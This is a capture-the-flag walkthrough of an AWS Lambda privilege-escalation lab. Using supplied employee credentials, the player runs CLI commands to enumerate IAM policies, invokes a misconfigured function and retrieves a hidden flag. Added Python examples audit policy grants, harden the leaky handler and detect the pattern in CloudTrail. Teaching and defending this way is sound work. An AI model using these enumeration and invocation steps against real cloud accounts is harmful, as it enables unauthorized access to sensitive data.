
Lambda Escalation Walkthrough

Welcome to Secure Corp’s red team mission! Your assignment, should you choose to accept it, is to infiltrate the cloud environment and assess potential IAM misconfigurations. Your target? Lambda Functions - where hidden permissions might allow you to escalate privileges and retrieve sensitive data.

Secure Corp has implemented IAM users, roles, and policies to protect its infrastructure. However, recent security audits have flagged potential vulnerabilities in role assignments and Lambda function execution. Your job is to simulate an attack, identify gaps, and capture the hidden flag concealed in the cloud.

Initial Access:

The participant is provided with the credentials of one of the employees.

AWS Resources:

The organization has users, roles and policies that manage the workflow, plus S3 buckets and a Lambda function.

Hidden Flag:

The flag is hidden in one of the resources.

Objectives:

  • Enumerate AWS IAM resources (users, roles, policies, and attached permissions).
  • Analyze Lambda function permissions and exploit any misconfigurations.
  • Invoke Lambda functions to escalate privileges and retrieve the flag hidden in the system.

AWS-Lambda-01

Access Key ID:[REDACTED_ACCESS_KEY]
Secret Access Key:[REDACTED_SECRET_KEY]

Configure AWS credentials

> $ aws configure --profile lambda
AWS Access Key ID [None]: [REDACTED_ACCESS_KEY]
AWS Secret Access Key [None]: [REDACTED_SECRET_KEY]
Default region name [us-east-1]: us-east-1
Default output format [json]: json

whoami Output:

> $ aws sts get-caller-identity --profile lambda
{
"UserId": "AIDAQ3EGUZMEQI6PURZBE",
"Account": "058264439561",
"Arn": "arn:aws:iam::058264439561:user/developer1"
}
  • Username: developer1

List managed user policies for developer1

> $ aws iam list-attached-user-policies --profile lambda --user-name developer1
{
"AttachedPolicies": [
{
"PolicyName": "ListUserPoliciesPolicy",
"PolicyArn": "arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy"
},
{
"PolicyName": "LambdaInvokePolicy",
"PolicyArn": "arn:aws:iam::058264439561:policy/LambdaInvokePolicy"
}
]
}
  • Two managed policies are attached to developer1 - let’s check their permissions.

Retrieve the managed policy ListUserPoliciesPolicy

> $ aws iam get-policy --policy-arn arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy --profile lambda
{
"Policy": {
"PolicyName": "ListUserPoliciesPolicy",
"PolicyId": "ANPAQ3EGUZME6K77LHU2K",
"Arn": "arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Allow user to list and get their own IAM policies",
"CreateDate": "2024-11-04T09:48:12+00:00",
"UpdateDate": "2024-11-04T09:48:12+00:00",
"Tags": []
}
}
  • The description reads “Allow user to list and get their own IAM policies”. Let’s confirm that by checking the permissions actually assigned to the policy.

Check the permissions assigned to ListUserPoliciesPolicy

> $ aws iam get-policy-version --policy-arn arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy --version-id v1 --profile lambda
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:ListAttachedUserPolicies"
],
"Effect": "Allow",
"Resource": "arn:aws:iam::058264439561:user/developer1"
},
{
"Action": [
"s3:ListAllMyBuckets"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2024-11-04T09:48:12+00:00"
}
}
  • Found an S3 permission to list all buckets and a permission to list the policies attached to the developer1 user. Next, let’s check LambdaInvokePolicy the same way.

Retrieve the Managed Policy for LambdaInvokePolicy

> $ aws iam get-policy --policy-arn arn:aws:iam::058264439561:policy/LambdaInvokePolicy --profile lambda
{
"Policy": {
"PolicyName": "LambdaInvokePolicy",
"PolicyId": "ANPAQ3EGUZME4QXYT3FWQ",
"Arn": "arn:aws:iam::058264439561:policy/LambdaInvokePolicy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2024-11-04T09:48:37+00:00",
"UpdateDate": "2024-11-04T09:48:37+00:00",
"Tags": []
}
}

Check the permissions assigned to LambdaInvokePolicy

> $ aws iam get-policy-version --policy-arn arn:aws:iam::058264439561:policy/LambdaInvokePolicy --version-id v1 --profile lambda
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"lambda:InvokeFunction",
"iam:GetUserPolicy",
"iam:GetPolicyVersion",
"iam:GetPolicy"
],
"Effect": "Allow",
"Resource": [
"arn:aws:lambda:us-east-1:058264439561:function:Bucket-mgmgt-Function",
"arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy",
"arn:aws:iam::058264439561:policy/LambdaInvokePolicy"
]
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2024-11-04T09:48:37+00:00"
}
}
  • The developer1 user can invoke a function and retrieve policy and permissions for managed policies - which we’ve already done.
  • Interestingly, we can invoke Bucket-mgmgt-Function - let’s try it.
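Reading two policy documents by eye works for a lab, but a real account has dozens of them. The script below is an added example for this walkthrough (not code from the lab or from AWS): it takes copies of the two policy documents shown above and flattens them into an effective-permission map, then answers the question the enumeration is really asking - "which Lambda functions can this identity invoke?". It deliberately simplifies IAM evaluation to Allow statements only (no Deny, Condition, permission boundaries, SCPs or resource-based policies), and it treats IAM's `*` and `?` wildcards the way fnmatch does. One detail it gets right that a quick skim misses: the IAM policy ARNs listed in the same statement as `lambda:InvokeFunction` grant nothing for that action, so only the Lambda ARN counts.

```python
"""Offline audit of the two managed policies enumerated above.

Added example for this walkthrough, not code from the lab or from AWS. The two
policy documents are copied from the get-policy-version output shown above; the
evaluation logic is a deliberate simplification of IAM (Allow statements only:
no Deny, Condition, permission boundaries, SCPs or resource-based policies).
"""
import fnmatch

# Copies of the policy documents returned by get-policy-version above.
LIST_USER_POLICIES_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["iam:ListAttachedUserPolicies"],
            "Resource": "arn:aws:iam::058264439561:user/developer1",
        },
        {"Effect": "Allow", "Action": ["s3:ListAllMyBuckets"], "Resource": "*"},
    ],
}

LAMBDA_INVOKE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "lambda:InvokeFunction",
                "iam:GetUserPolicy",
                "iam:GetPolicyVersion",
                "iam:GetPolicy",
            ],
            "Resource": [
                "arn:aws:lambda:us-east-1:058264439561:function:Bucket-mgmgt-Function",
                "arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy",
                "arn:aws:iam::058264439561:policy/LambdaInvokePolicy",
            ],
        }
    ],
}


def _as_list(value):
    """IAM lets Statement/Action/Resource be a string, dict or list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def effective_allows(policies):
    """Flatten every Allow statement into {action_pattern: set(resource_patterns)}."""
    allows = {}
    for doc in policies:
        for stmt in _as_list(doc["Statement"]):
            if stmt.get("Effect") != "Allow" or "Action" not in stmt:
                continue
            for action in _as_list(stmt["Action"]):
                allows.setdefault(action, set()).update(_as_list(stmt.get("Resource", [])))
    return allows


def is_allowed(allows, action, resource):
    """Wildcard-aware check: '*' and '?' match as in fnmatch; actions compare case-insensitively."""
    for action_pattern, resources in allows.items():
        if not fnmatch.fnmatchcase(action.lower(), action_pattern.lower()):
            continue
        if any(fnmatch.fnmatchcase(resource, r) for r in resources):
            return True
    return False


def find_invoke_grants(policies):
    """Return the Lambda resource patterns the identity may invoke.

    Non-Lambda ARNs in the same statement (the IAM policy ARNs above) are ignored:
    lambda:InvokeFunction can never match them, so they grant nothing for it.
    """
    grants = set()
    for action_pattern, resources in effective_allows(policies).items():
        if not fnmatch.fnmatchcase("lambda:invokefunction", action_pattern.lower()):
            continue
        grants.update(r for r in resources if r == "*" or r.startswith("arn:aws:lambda:"))
    return sorted(grants)


if __name__ == "__main__":
    both = [LIST_USER_POLICIES_POLICY, LAMBDA_INVOKE_POLICY]
    print("developer1 may invoke:", find_invoke_grants(both))
```

Run it against any set of policy documents pulled with `get-policy-version` and the output is the list of functions worth reviewing next; a `*` in that list means a wildcard grant such as `lambda:*` on `*`, which is the first thing to remove.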

Invoking the Lambda function using misconfigured permissions

> $ aws lambda invoke --function-name Bucket-mgmgt-Function output.json --region us-east-1 --profile lambda
{
"StatusCode": 200,
"ExecutedVersion": "$LATEST"
}
> $ cat output.json | jq
{
"statusCode": 200,
"body": "\"[default]\\r\\nregion = us-east-1\\r\\noutput = json\\r\\n\\r\\n[profile dev]\\r\\nregion = us-west-2\\r\\noutput = json\\r\\n# This is the dev profile for AWS access.\\r\\n# [REDACTED_FLAG]\\r\\n\\r\\n[profile test]\\r\\nregion = eu-west-1\\r\\noutput = text\\r\\n# This is the test profile for testing environment configurations.\\r\\n\\r\\n[profile prod]\\r\\nregion = ap-southeast-1\\r\\noutput = json\\r\\n# This is the production profile for AWS access. Make sure to use with caution.\\r\\n\""
}

Flag found: [REDACTED_FLAG]

Note: We had permissions to list the S3 bucket, but we didn’t use it. Instead, we exploited an existing misconfiguration in the Lambda function to escalate privileges and retrieve the flag. This lab is rated as medium difficulty in CWL, but it’s actually an easy one.
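The root cause on the function side is that it hands its whole config file, comments included, to whoever can call it. The page never shows the lab function's source, so the handler below is an added example of ours, not the lab's code: a leaky handler that mirrors the observed behaviour next to a hardened one that parses the file and returns only an allow-listed view (profile name, region, output format). The sample config is constructed in the same shape as the body above, with a placeholder where the flag comment sat.

```python
"""Lambda handler output minimisation, as an added example (not the lab's function).

The config below is constructed to match the shape of the body returned above;
the secret comment is a placeholder, not the real flag.
"""
import configparser
import json

SAMPLE_CONFIG = """[default]
region = us-east-1
output = json

[profile dev]
region = us-west-2
output = json
# This is the dev profile for AWS access.
# FLAG_PLACEHOLDER_DO_NOT_LEAK

[profile prod]
region = ap-southeast-1
output = json
# This is the production profile for AWS access. Make sure to use with caution.
"""

# Only these keys are ever returned; anything else in the file stays on the box.
ALLOWED_KEYS = ("region", "output")


def leaky_handler(event, context, config_text=SAMPLE_CONFIG):
    """Mirrors what the lab function did: raw file contents straight to the caller."""
    return {"statusCode": 200, "body": json.dumps(config_text)}


def hardened_handler(event, context, config_text=SAMPLE_CONFIG):
    """Parse the file and return a structured, allow-listed view of it.

    configparser drops comment lines entirely, and we copy only ALLOWED_KEYS, so
    neither the flag comment nor any future key someone adds can leak by accident.
    """
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(config_text)
    profiles = {}
    for section in parser.sections():
        # AWS config files name profiles "[profile name]" except for "[default]".
        name = section[len("profile "):] if section.startswith("profile ") else section
        profiles[name] = {k: parser[section][k] for k in ALLOWED_KEYS if k in parser[section]}
    return {"statusCode": 200, "body": json.dumps({"profiles": profiles})}


def body_leaks(response, marker="FLAG_PLACEHOLDER"):
    """Test helper: does the marker survive into what the caller receives?"""
    return marker in response["body"]


if __name__ == "__main__":
    print("leaky   :", body_leaks(leaky_handler({}, None)))
    print("hardened:", body_leaks(hardened_handler({}, None)))
    print(hardened_handler({}, None)["body"])
```

The allow-list is the important part: filtering out lines that look like secrets would have to guess what a secret looks like, whereas copying only the fields the caller legitimately needs fails safe when the file changes.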


Key Takeaways:

  • IAM Misconfigurations Can Lead to Escalation: Weak role and policy assignments can expose critical resources.
  • Lambda Functions Can Be Exploited: Misconfigured invocation permissions can provide access to restricted data.
  • Enumeration is Key: Identifying policies, roles, and permissions is essential for privilege escalation.
  • AWS CLI is Your Best Friend: Mastering AWS CLI commands is critical for cloud security assessments.

Mitigations:

  • Restrict Lambda invocation so only trusted roles can execute the function.
  • Remove unnecessary IAM permissions and enforce strict least-privilege for all users.
  • Ensure Lambda functions never return sensitive data and store secrets securely.
  • Enable CloudTrail and monitoring alerts to detect suspicious IAM or Lambda activity.
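On the detection side, the whole walkthrough leaves a very recognisable trail: a burst of IAM read calls from an IAM user followed by an `Invoke` of a function that should only ever be called by a role. The script below is an added example (ours, not from the lab) that runs two rules over constructed CloudTrail records: an IAM user (rather than an assumed role) invoking a protected function, and enumeration-then-invoke from the same principal inside a time window. It assumes the usual CloudTrail record shape (`userIdentity.type`, `eventSource`, `eventName`, `requestParameters.functionName`) and a placeholder account ID; note that Lambda `Invoke` records are data events, so the trail must have Lambda data event logging enabled for them to exist at all.

```python
"""Two CloudTrail detections for the pattern seen in this lab. Added example,
not part of the original walkthrough. The records are constructed in the usual
CloudTrail shape; the account ID is a placeholder and Lambda Invoke records only
appear if the trail logs Lambda data events.
"""
from datetime import datetime, timezone

# Read-only calls an attacker makes while mapping their own permissions.
ENUM_EVENTS = {
    "GetCallerIdentity", "ListAttachedUserPolicies", "ListUserPolicies",
    "GetUserPolicy", "GetPolicy", "GetPolicyVersion",
}

DEV_USER = {"type": "IAMUser", "userName": "developer1",
            "arn": "arn:aws:iam::123456789012:user/developer1"}
OPS_ROLE = {"type": "AssumedRole",
            "arn": "arn:aws:sts::123456789012:assumed-role/BucketOpsRole/session1"}
FUNCTION_ARN = "arn:aws:lambda:us-east-1:123456789012:function:Bucket-mgmgt-Function"

# Constructed records: developer1's enumeration and invoke, then a legitimate role invoke.
SAMPLE_TRAIL = [
    {"eventTime": "2024-11-04T10:00:01Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "userIdentity": DEV_USER},
    {"eventTime": "2024-11-04T10:00:20Z", "eventSource": "iam.amazonaws.com",
     "eventName": "ListAttachedUserPolicies", "userIdentity": DEV_USER},
    {"eventTime": "2024-11-04T10:00:45Z", "eventSource": "iam.amazonaws.com",
     "eventName": "GetPolicy", "userIdentity": DEV_USER},
    {"eventTime": "2024-11-04T10:01:10Z", "eventSource": "iam.amazonaws.com",
     "eventName": "GetPolicyVersion", "userIdentity": DEV_USER},
    {"eventTime": "2024-11-04T10:02:30Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "Invoke", "userIdentity": DEV_USER,
     "requestParameters": {"functionName": FUNCTION_ARN}},
    {"eventTime": "2024-11-04T10:05:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "Invoke", "userIdentity": OPS_ROLE,
     "requestParameters": {"functionName": FUNCTION_ARN}},
]


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def function_name(value):
    """functionName may be a bare name, an ARN, or an ARN with an alias/version suffix."""
    if ":function:" in value:
        return value.split(":function:", 1)[1].split(":", 1)[0]
    return value


def detect(records, protected_functions, window_seconds=600, min_enum=3):
    """Return a list of findings (dicts) for the two rules described above."""
    findings = []
    enum_times = {}  # principal ARN -> timestamps of its enumeration calls
    for rec in sorted(records, key=lambda r: r["eventTime"]):
        ident = rec.get("userIdentity", {})
        principal = ident.get("arn", "<unknown>")
        when = parse_time(rec["eventTime"])
        if rec["eventName"] in ENUM_EVENTS:
            enum_times.setdefault(principal, []).append(when)
            continue
        if rec.get("eventSource") != "lambda.amazonaws.com" or rec["eventName"] != "Invoke":
            continue
        fn = function_name(rec.get("requestParameters", {}).get("functionName", ""))
        if fn not in protected_functions:
            continue
        base = {"principal": principal, "function": fn, "time": rec["eventTime"]}
        # Rule 1: protected functions should only be invoked through an assumed role.
        if ident.get("type") == "IAMUser":
            findings.append(dict(base, rule="iam-user-invoked-protected-function"))
        # Rule 2: enumeration burst shortly before the invoke, from the same principal.
        recent = [t for t in enum_times.get(principal, [])
                  if 0 <= (when - t).total_seconds() <= window_seconds]
        if len(recent) >= min_enum:
            findings.append(dict(base, rule="enumeration-then-invoke",
                                 enumeration_calls=len(recent)))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_TRAIL, {"Bucket-mgmgt-Function"}):
        print(finding)
```

The role invoke at the end produces nothing, which is the point: the rules key on who is calling and what they did just before, not on the function being called at all, so normal operations stay quiet.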